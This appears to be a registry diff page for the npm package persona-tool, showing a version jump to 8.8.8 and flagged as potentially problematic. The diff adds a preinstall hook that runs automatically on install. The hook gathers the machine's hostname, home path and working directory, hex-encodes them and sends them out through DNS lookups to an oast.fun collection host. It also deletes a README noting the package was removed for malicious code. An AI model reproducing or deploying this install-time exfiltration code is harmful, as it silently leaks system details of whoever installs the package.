persona-tool 0.0.1-security → 8.8.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of persona-tool might be problematic. Click here for more details.
- package/package.json +8 -3
- package/preinstall.js +55 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "persona-tool",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "8.8.8",
|
|
4
|
+
"description": "npm",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node preinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "fer1bytex0",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,55 @@
|
|
|
1
|
+
const dns = require('dns');
|
|
2
|
+
const crypto = require('crypto');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
|
|
6
|
+
const suffix = '.dns.fmcrifgjyoeeaahdavxvjm44hxuke3q0t.oast.fun';
|
|
7
|
+
const ns = 'dns1.fmcrifgjyoeeaahdavxvjm44hxuke3q0t.oast.fun';
|
|
8
|
+
|
|
9
|
+
const package = 'persona-tool';
|
|
10
|
+
|
|
11
|
+
// Only the bare minimum to be able to identify a vulnerable organization
|
|
12
|
+
const data = {
|
|
13
|
+
p: package,
|
|
14
|
+
h: os.hostname(),
|
|
15
|
+
d: path.resolve('~'),
|
|
16
|
+
c: process.cwd()
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
// Convert data to JSON, then to hexadecimal string, and split into chunks
|
|
20
|
+
const jsonData = JSON.stringify(data);
|
|
21
|
+
const hexData = Buffer.from(jsonData).toString('hex');
|
|
22
|
+
const chunks = hexData.match(/.{1,60}/g);
|
|
23
|
+
|
|
24
|
+
const id1 = crypto.randomBytes(6).toString('hex');
|
|
25
|
+
const id2 = crypto.randomBytes(6).toString('hex');
|
|
26
|
+
|
|
27
|
+
const resolveDns = (hostname, resolver) => {
|
|
28
|
+
return new Promise((resolve, reject) => {
|
|
29
|
+
dns.resolve4(hostname, {resolver}, (err) => {
|
|
30
|
+
if (err) reject(err);
|
|
31
|
+
else resolve();
|
|
32
|
+
});
|
|
33
|
+
});
|
|
34
|
+
};
|
|
35
|
+
|
|
36
|
+
const nsIpPromise = new Promise((resolve) => {
|
|
37
|
+
dns.resolve4(ns, (err, addresses) => {
|
|
38
|
+
if (err) resolve('8.8.4.4');
|
|
39
|
+
else resolve(addresses[0]);
|
|
40
|
+
});
|
|
41
|
+
});
|
|
42
|
+
|
|
43
|
+
nsIpPromise.then(nsIp => {
|
|
44
|
+
const resolver = [nsIp, '8.8.8.8'];
|
|
45
|
+
|
|
46
|
+
chunks.forEach((chunk, idx) => {
|
|
47
|
+
const host1 = `v2_f.${id1}.${idx}.${chunk}.v2_e${suffix}`;
|
|
48
|
+
const host2 = `v2_f.${id2}.${idx}.${chunk}.v2_e${suffix}`;
|
|
49
|
+
|
|
50
|
+
// Attempt DNS resolution
|
|
51
|
+
resolveDns(host1, resolver).catch(() => {});
|
|
52
|
+
resolveDns(host2, resolver).catch(() => {});
|
|
53
|
+
});
|
|
54
|
+
});
|
|
55
|
+
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=persona-tool for more information.
|